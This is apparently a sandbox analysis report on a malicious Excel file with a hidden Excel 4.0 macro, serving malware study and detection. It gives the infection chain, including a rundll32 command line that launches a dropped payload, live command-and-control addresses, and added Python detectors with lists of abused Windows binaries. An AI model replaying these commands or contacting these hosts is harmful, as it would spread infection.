
Analysis Report Documents_111651917_375818984.xls

Overview

General Information

Sample Name: Documents_111651917_375818984.xls
Analysis ID: 403285
MD5: 72526a505496a9b7da9a6c9651dbda5e
SHA1: 84cf963666314eee0d8ad1ef09e5462a66e3ccbf
SHA256: 3c20530c13d6736ec705786d1694052b2abf42bf87d3bbc359ea95b343fcf681
Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Injects a PE file into a foreign processes
Office process drops PE file
Sample uses process hollowing technique
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match
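The "Hidden Macro 4.0" classification and the "Found abnormal large hidden Excel 4.0 Macro sheet" signature above rest on two facts about the legacy BIFF8 format: every sheet in an .xls is declared by a BOUNDSHEET record in the workbook globals substream, whose hsState bits say whether the sheet is visible, hidden or very hidden and whose dt byte says whether it is a worksheet or an Excel 4.0 (XLM) macro sheet; and each sheet's data lives in its own substream, from BOF to EOF, at the offset the BOUNDSHEET record points to. The Python below is an added triage script written for this page, not part of the Joe Sandbox report or of any vendor tool: it walks those records in a raw Workbook stream and flags non-visible XLM macro sheets together with the size of their substream. Assumptions: the input is the raw BIFF8 "Workbook" stream (for a real .xls you first extract it from the OLE2 container, for example with olefile's openstream('Workbook'), which this example does not do), the sample stream is constructed inline rather than taken from the analysed document, and the 10,000-byte "large" cutoff is an arbitrary illustration, not the sandbox's threshold.

```python
import struct

# BIFF record types (MS-XLS section 2.4)
BOF = 0x0809
EOF_RECORD = 0x000A
BOUNDSHEET = 0x0085
DIMENSIONS = 0x0200
FORMULA = 0x0006

HS_STATE = {0: "visible", 1: "hidden", 2: "very hidden"}          # BoundSheet8.hsState
SHEET_TYPE = {0x00: "worksheet", 0x01: "xlm macro sheet",            # BoundSheet8.dt
              0x02: "chart", 0x06: "vba module"}


def iter_records(stream, offset=0):
    """Yield (offset, record_type, payload) for the BIFF records starting at offset."""
    pos = offset
    while pos + 4 <= len(stream):
        rtype, rlen = struct.unpack_from("<HH", stream, pos)
        yield pos, rtype, stream[pos + 4:pos + 4 + rlen]
        pos += 4 + rlen


def parse_boundsheet(payload):
    """Decode BoundSheet8: lbPlyPos(4) | hsState in low 2 bits(1) | dt(1) | ShortXLUnicodeString."""
    ply_pos, grbit, dt = struct.unpack_from("<IBB", payload, 0)
    cch, flags = struct.unpack_from("<BB", payload, 6)
    raw = payload[8:]
    if flags & 0x01:                                   # fHighByte: UTF-16LE characters
        name = raw[:cch * 2].decode("utf-16-le", "replace")
    else:                                              # otherwise one byte per character
        name = raw[:cch].decode("latin-1")
    return {"pos": ply_pos, "state": HS_STATE.get(grbit & 0x03, "unknown"),
            "type": SHEET_TYPE.get(dt, "other"), "name": name}


def substream_size(stream, start):
    """Bytes from a sheet's BOF record up to and including its EOF record."""
    size = 0
    for _, rtype, payload in iter_records(stream, start):
        size += 4 + len(payload)
        if rtype == EOF_RECORD:
            break
    return size


def find_hidden_macro_sheets(stream, large_threshold=10_000):
    """Describe every sheet declared in the globals substream and flag non-visible XLM macro sheets."""
    sheets = []
    for _, rtype, payload in iter_records(stream):
        if rtype == EOF_RECORD:                        # end of the workbook globals substream
            break
        if rtype != BOUNDSHEET:
            continue
        sheet = parse_boundsheet(payload)
        sheet["bytes"] = substream_size(stream, sheet["pos"])
        sheet["suspicious"] = sheet["type"] == "xlm macro sheet" and sheet["state"] != "visible"
        sheet["large"] = sheet["suspicious"] and sheet["bytes"] >= large_threshold
        sheets.append(sheet)
    return sheets


# --- constructed sample stream; not the analysed document -------------------------

def _record(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload


def _bof(dt):
    """BIFF8 BOF: vers=0x0600, dt (0x0005 globals, 0x0010 worksheet, 0x0040 macro sheet), build, year, bfh, sfo."""
    return _record(BOF, struct.pack("<HHHHII", 0x0600, dt, 0, 0, 0, 0))


def _boundsheet(ply_pos, hs_state, dt, name):
    raw = name.encode("latin-1")
    return _record(BOUNDSHEET, struct.pack("<IBB", ply_pos, hs_state, dt)
                   + struct.pack("<BB", len(raw), 0) + raw)


def build_sample_workbook():
    """Globals + a visible worksheet + a 'very hidden' XLM macro sheet padded with 400 FORMULA records."""
    sheet1 = _bof(0x0010) + _record(DIMENSIONS, struct.pack("<IIHHH", 0, 10, 0, 5, 0)) + _record(EOF_RECORD, b"")
    macro = _bof(0x0040) + b"".join(_record(FORMULA, b"\x00" * 60) for _ in range(400)) + _record(EOF_RECORD, b"")
    # lbPlyPos is a fixed-width field, so the globals length can be computed with dummy offsets first
    globals_len = len(_bof(0x0005) + _boundsheet(0, 0, 0x00, "Sheet1")
                      + _boundsheet(0, 2, 0x01, "Sheet2") + _record(EOF_RECORD, b""))
    return (_bof(0x0005)
            + _boundsheet(globals_len, 0, 0x00, "Sheet1")                  # visible worksheet
            + _boundsheet(globals_len + len(sheet1), 2, 0x01, "Sheet2")    # hsState=2 very hidden, dt=1 macro sheet
            + _record(EOF_RECORD, b"")
            + sheet1 + macro)


if __name__ == "__main__":
    for s in find_hidden_macro_sheets(build_sample_workbook()):
        flag = "  <-- hidden XLM macro sheet" if s["suspicious"] else ""
        print(f"{s['name']:8} {s['type']:16} {s['state']:12} {s['bytes']:6d} bytes{flag}{' (large)' if s['large'] else ''}")
```

On a real file, feed `olefile.OleFileIO(path).openstream('Workbook').read()` to `find_hidden_macro_sheets`. A "very hidden" state (2) cannot be undone from Excel's Unhide dialog, which is why droppers of this family prefer it to plain "hidden"; the sheet name is worth printing too, since malicious macro sheets are often named with whitespace or to look like a data sheet. Sheet size is only a heuristic: what actually matters is the formulas in the substream, which is what the "suspicious formulas" verdict above examines.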

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4944 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 4744 cmdline: rundll32 ..\bsdnbsej.dbw,PluginInit MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • cmd.exe (PID: 4928 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup
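The Startup tree above is the whole infection chain in three lines: EXCEL.EXE, the only user-launched process, spawns rundll32.exe with a module whose extension is not .dll (..\bsdnbsej.dbw) given as a relative path and with an explicit export (PluginInit), and that rundll32 in turn spawns cmd.exe, the process the later signatures tie to hollowing and the network traffic. That shape is cheap to detect from endpoint process-creation telemetry. The Python below is an added example written for this page, not Joe Sandbox's or any vendor's detection logic: it scores process-creation events for those indicators and then pulls in descendants of an alerted process. The event dicts use Sysmon-style field names (ProcessId, ParentProcessId, ParentImage, Image, CommandLine) as an assumed schema, the sample events are constructed from the tree above plus one benign rundll32 launch with an invented Explorer PID, and the one-point-per-indicator weighting and threshold of 2 are arbitrary illustrations.

```python
import ntpath
import re

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# optional quotes, optional directory, rundll32 with or without .exe, then the argument string
_RUNDLL32_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+(?P<args>.*)$', re.IGNORECASE)


def parse_rundll32(cmdline):
    """Return (module, export) for a rundll32 command line, or None if it is not one.

    rundll32 expects '<module>,<export> [args]'; the module may be quoted and the
    export may be separated from it by ',' inside the same token or after a space.
    """
    m = _RUNDLL32_RE.match(cmdline)
    if not m:
        return None
    args = m.group("args").strip()
    if args.startswith('"'):                          # quoted module path
        end = args.find('"', 1)
        module, rest = args[1:end], args[end + 1:]
    else:
        module, _, rest = args.partition(" ")
    module, _, export = module.partition(",")
    if not export and rest.lstrip().startswith(","):  # 'module ,Export' form
        export = rest.lstrip()[1:].split(" ", 1)[0]
    return module, export


def score_process_event(ev):
    """Score one Sysmon-style process-creation event; each matched indicator adds one point."""
    parent = ntpath.basename(ev["ParentImage"]).lower()
    image = ntpath.basename(ev["Image"]).lower()
    reasons, module, export = [], None, None
    if parent in OFFICE_IMAGES and image in LOLBINS:
        reasons.append(f"Office process {parent} spawned {image}")
    if parent == "rundll32.exe" and image in SHELLS:
        reasons.append(f"rundll32.exe spawned a shell ({image})")
    if image == "rundll32.exe":
        parsed = parse_rundll32(ev["CommandLine"])
        if parsed:
            module, export = parsed
            ext = ntpath.splitext(module)[1].lower()
            if ext != ".dll":
                reasons.append(f"rundll32 module has a non-.dll extension ({ext or 'none'}): {module}")
            if not ntpath.isabs(module) and module.startswith(".."):
                reasons.append(f"rundll32 module is a relative traversal path: {module}")
    return {"score": len(reasons), "reasons": reasons, "module": module, "export": export}


def triage_process_tree(events, threshold=2):
    """Alert on events at or above threshold, then pull in their descendants that carry any indicator."""
    scored = {ev["ProcessId"]: (ev, score_process_event(ev)) for ev in events}
    alerted = {pid for pid, (_, s) in scored.items() if s["score"] >= threshold}
    changed = True
    while changed:                                    # propagate down the tree until stable
        changed = False
        for pid, (ev, s) in scored.items():
            if pid not in alerted and ev["ParentProcessId"] in alerted and s["score"] >= 1:
                alerted.add(pid)
                changed = True
    return [scored[pid] for pid in scored if pid in alerted]


# Constructed events: the three processes from the report's Startup tree plus one benign
# rundll32 launch from Explorer. The Explorer PID 1000 is invented for the example.
SAMPLE_EVENTS = [
    {"ProcessId": 4944, "ParentProcessId": 1000, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding"},
    {"ProcessId": 4744, "ParentProcessId": 4944,
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe", "CommandLine": r"rundll32 ..\bsdnbsej.dbw,PluginInit"},
    {"ProcessId": 4928, "ParentProcessId": 4744, "ParentImage": r"C:\Windows\SysWOW64\rundll32.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r"C:\Windows\System32\cmd.exe"},
    {"ProcessId": 5100, "ParentProcessId": 1000, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl'},
]

if __name__ == "__main__":
    for ev, s in triage_process_tree(SAMPLE_EVENTS):
        print(f"ALERT pid={ev['ProcessId']} {ev['CommandLine']}")
        for r in s["reasons"]:
            print(f"    - {r}")
        if s["export"]:
            print(f"    - export called: {s['export']}")
```

The benign Control Panel launch scores zero because its module is an absolute-free but well-formed .dll name with no traversal; the Excel-spawned rundll32 scores three and drags its cmd.exe child into the alert even though that child alone only carries one indicator. The export name is reported for context rather than scored: rundll32 always needs one, so it is useful for pivoting (here, PluginInit) but not for deciding.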

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: Documents_111651917_375818984.xls
Rule: SUSP_EnableContent_String_Gen
Description: Detects suspicious string that asks to enable active content in Office Doc
Author: Florian Roth
Strings:
  • 0x165c5:$e1: Enable Editing
  • 0x1630f:$e3: Enable editing
  • 0x163e1:$e4: Enable content

Sigma Overview

No Sigma rule has matched

Signature Overview

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 104.21.64.132:443 -> 192.168.2.4:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.222.240.99:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 54.163.9.216:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: dnsapi.pdbUGP source: cmd.exe, 00000007.00000002.972468741.00000000010B0000.00000002.00000001.sdmp
Source: Binary string: wininet.pdb source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp
Source: Binary string: c:\Behind\964\Chance_lie\her l\money.pdb source: vegas[1].dll.0.dr
Source: Binary string: bcrypt.pdb source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp
Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000007.00000002.974902866.0000000004EB0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdb source: cmd.exe, 00000007.00000002.974902866.0000000004EB0000.00000002.00000001.sdmp
Source: Binary string: msi.pdbUGP source: cmd.exe, 00000007.00000002.973317482.0000000004AC0000.00000002.00000001.sdmp
Source: Binary string: ole32.pdbUGP source: cmd.exe, 00000007.00000002.972298615.0000000000D30000.00000002.00000001.sdmp
Source: Binary string: c:\Behind\964\Chance_lie\her l\money.pdb@ source: vegas[1].dll.0.dr
Source: Binary string: ole32.pdb source: cmd.exe, 00000007.00000002.972298615.0000000000D30000.00000002.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000001.00000003.711716149.0000000003035000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: msi.pdb source: cmd.exe, 00000007.00000002.973317482.0000000004AC0000.00000002.00000001.sdmp
Source: Binary string: crypt32.pdbUGP source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp
Source: Binary string: bcrypt.pdbGCTL source: rundll32.exe, 00000001.00000003.711920578.0000000003035000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdbUGP source: rundll32.exe, 00000001.00000003.711716149.0000000003035000.00000004.00000001.sdmp
Source: Binary string: dnsapi.pdb source: cmd.exe, 00000007.00000002.972468741.00000000010B0000.00000002.00000001.sdmp
Source: Binary string: netapi32.pdb source: cmd.exe, 00000007.00000002.972431909.0000000000E30000.00000002.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdbUGP source: rundll32.exe, 00000001.00000003.711977375.0000000003036000.00000004.00000001.sdmp
Source: Binary string: netapi32.pdbUGP source: cmd.exe, 00000007.00000002.972431909.0000000000E30000.00000002.00000001.sdmp
Source: Binary string: wininet.pdbUGP source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp
Source: Binary string: shell32.pdbUGP source: cmd.exe, 00000007.00000002.976381117.00000000051E0000.00000002.00000001.sdmp
Source: Binary string: crypt32.pdb source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_67335D36 FindFirstFileExW,

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\vegas[1].dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: vegas[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\rundll32.exe
Source: global traffic | DNS query: name: otusmail.com
Source: global traffic | TCP traffic: 192.168.2.4:49709 -> 104.21.64.132:443 (listed twice in the report)
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 18.222.240.99 (this line is repeated 50 times in the report; the sample connects to 18.222.240.99 directly, without resolving a host name first)
Source: unknown | DNS traffic detected: queries for: otusmail.com
Strings found in binary or memory, grouped by the memory region they were read from. Trailing characters such as "0", "0G" or "0U" after a URL are bytes of the adjacent DER-encoded certificate structure picked up by the string scanner (0x30 is the ASN.1 SEQUENCE tag) and are not part of the URL.

cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmp (the region that also carries the wininet.pdb reference above):
  • http://.css
  • http://.jpg
  • http://html4/loose.dtd

rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmp (Windows automatic root certificate update URL):
  • http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en

rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp and 77EC63BDA74BD0D0E0426DC8F8008506.1.dr:
  • http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab

rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp and rundll32.exe, 00000001.00000003.781100347.0000000004FA6000.00000004.00000001.sdmp:
  • http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?54c45430557b4

rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmp and cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp:
  • http://crl.globalsign.net/root-r2.crl0

cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmp (the region that also carries the crypt32.pdb reference above; these are the CRL, OCSP and CPS pointers embedded in the Windows root certificate store, and none of them appears in the sample's own network activity, which the report limits to otusmail.com, 104.21.64.132, 18.222.240.99 and 54.163.9.216):
  • http://ac.economia.gob.mx/cps.html0
  • http://ac.economia.gob.mx/last.crl0G
  • http://acedicom.edicomgroup.com/doc0
  • http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
  • http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
  • http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
  • http://ca.disig.sk/ca/crl/ca_disig.crl0
  • http://ca.mtin.es/mtin/DPCyPoliticas0
  • http://ca.mtin.es/mtin/DPCyPoliticas0g
  • http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
  • http://ca.mtin.es/mtin/ocsp0
  • http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
  • http://certificates.starfieldtech.com/repository/1604
  • http://certs.oati.net/repository/OATICA2.crl0
  • http://certs.oati.net/repository/OATICA2.crt0
  • http://certs.oaticerts.com/repository/OATICA2.crl
  • http://certs.oaticerts.com/repository/OATICA2.crt08
  • http://cps.chambersign.org/cps/chambersignroot.html0
  • http://cps.chambersign.org/cps/chambersroot.html0
  • http://cps.siths.se/sithsrootcav1.html0
  • http://crl.certigna.fr/certignarootca.crl01
  • http://crl.chambersign.org/chambersignroot.crl0
  • http://crl.chambersign.org/chambersroot.crl0
  • http://crl.comodoca.com/AAACertificateServices.crl06
  • http://crl.defence.gov.au/pki0
  • http://crl.dhimyotis.com/certignarootca.crl0
  • http://crl.oces.trust2408.com/oces.crl0
  • http://crl.pki.wellsfargo.com/wsprca.crl0
  • http://crl.securetrust.com/SGCA.crl0
  • http://crl.securetrust.com/STCA.crl0
  • http://crl.ssc.lt/root-a/cacrl.crl0
  • http://crl.ssc.lt/root-b/cacrl.crl0
  • http://crl.ssc.lt/root-c/cacrl.crl0
  • http://crl.xrampsecurity.com/XGCA.crl0
  • http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
  • http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRootDirUrl1.3.6.1.4.1.311.2.4.
  • http://eca.hinet.net/repository/CRL2/CA.crl0
  • http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
  • http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
  • http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
  • http://fedir.comsign.co.il/crl/ComSignCA.crl0
  • http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
  • http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
  • http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
  • http://ocsp.accv.es0
  • http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
  • http://ocsp.ncdc.gov.sa0
  • http://ocsp.pki.gva.es0
  • http://ocsp.suscerte.gob.ve0
  • http://pki.digidentity.eu/validatie0
  • http://pki.registradores.org/normativa/index.htm0
  • http://policy.camerfirma.com0
  • http://postsignum.ttc.cz/crl/psrootqca2.crl0
  • http://repository.swisssign.com/0
  • http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
  • http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
  • http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
  • http://web.ncdc.gov.sa/crl/nrcaparta1.crl
  • http://www.acabogacia.org/doc0
  • http://www.acabogacia.org0
  • http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
  • http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
  • http://www.accv.es/legislacion_c.htm0U
  • http://www.accv.es00
  • http://www.agesic.gub.uy/acrn/acrn.crl0)
  • http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
  • http://www.ancert.com/cps0
  • http://www.anf.es
  • http://www.anf.es/AC/RC/ocsp0c
  • http://www.anf.es/es/address-direccion.html
  • http://www.ca.posta.rs/dokumentacija0h
  • http://www.cert.fnmt.es/dpcs/0
  • http://www.certeurope.fr/reference/pc-root2.pdf0
  • http://www.certeurope.fr/reference/root2.crl0
  • http://www.certicamara.com/dpc/0Z
  • http://www.certplus.com/CRL/class1.crl0
  • http://www.certplus.com/CRL/class2.crl0
  • http://www.certplus.com/CRL/class3.crl0
  • http://www.certplus.com/CRL/class3P.crl0
  • http://www.certplus.com/CRL/class3TS.crl0
  • http://www.chambersign.org1
  • http://www.comsign.co.il/cps0
  • http://www.correo.com.uy/correocert/cps.pdf0
  • http://www.datev.de/zertifikat-policy-bt0
  • http://www.datev.de/zertifikat-policy-int0
  • http://www.datev.de/zertifikat-policy-std0
  • http://www.defence.gov.au/pki0
  • http://www.disig.sk/ca/crl/ca_disig.crl0
  • http://www.disig.sk/ca0f
  • http://www.dnie.es/dpc0
  • http://www.e-me.lv/repository0
  • http://www.e-szigno.hu/RootCA.crl
  • http://www.e-szigno.hu/RootCA.crt0
  • http://www.e-szigno.hu/SZSZ/0
  • http://www.e-trust.be/CPS/QNcerts
  • http://www.ecee.gov.pt/dpc0
  • http://www.echoworx.com/ca/root2/cps.pdf0
  • http://www.eme.lv/repository0
  • http://www.firmaprofesional.com/cps0
  • http://www.globaltrust.info0
  • http://www.globaltrust.info0=
  • http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
  • http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
  • http://www.oaticerts.com/repository.
  • http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
  • http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
  • http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
  • http://www.pki.gva.es/cps0
  • http://www.pki.gva.es/cps0%
  • http://www.pkioverheid.nl/policies/root-policy-G20
  • http://www.pkioverheid.nl/policies/root-policy0
  • http://www.postsignum.cz/crl/psrootqca2.crl02
  • http://www.quovadis.bm0
  • http://www.quovadisglobal.com/cps0
  • http://www.rcsc.lt/repository0
  • http://www.sk.ee/cps/0
  • http://www.sk.ee/juur/crl/0
  • http://www.ssc.lt/cps03
  • http://www.suscerte.gob.ve/dpc0
  • http://www.suscerte.gob.ve/lcr0#
  • http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
  • http://www.trustdst.com/certificates/policy/ACES-index.html0
  • http://www.uce.gub.uy/acrn/acrn.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://%s/%s/%sendcahttps://%s.pinrules.crt/%sRetrieveValidatestaple:OcspGetOcspPostOcspFailoverExp
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/
Source: rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/U
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/gO~
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/hOg
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/qOh
Source: rundll32.exe, 00000001.00000002.802478061.000000000301A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/update/info
Source: rundll32.exe, 00000001.00000003.801717651.00000000030BE000.00000004.00000001.sdmpString found in binary or memory: https://18.222.240.99/update/infoy
Source: rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpString found in binary or memory: https://18.222.240.99/versal
Source: cmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpString found in binary or memory: https://HTTP/1.1
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://eca.hinet.net/repository0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://repository.luxtrust.lu0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
Source: cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
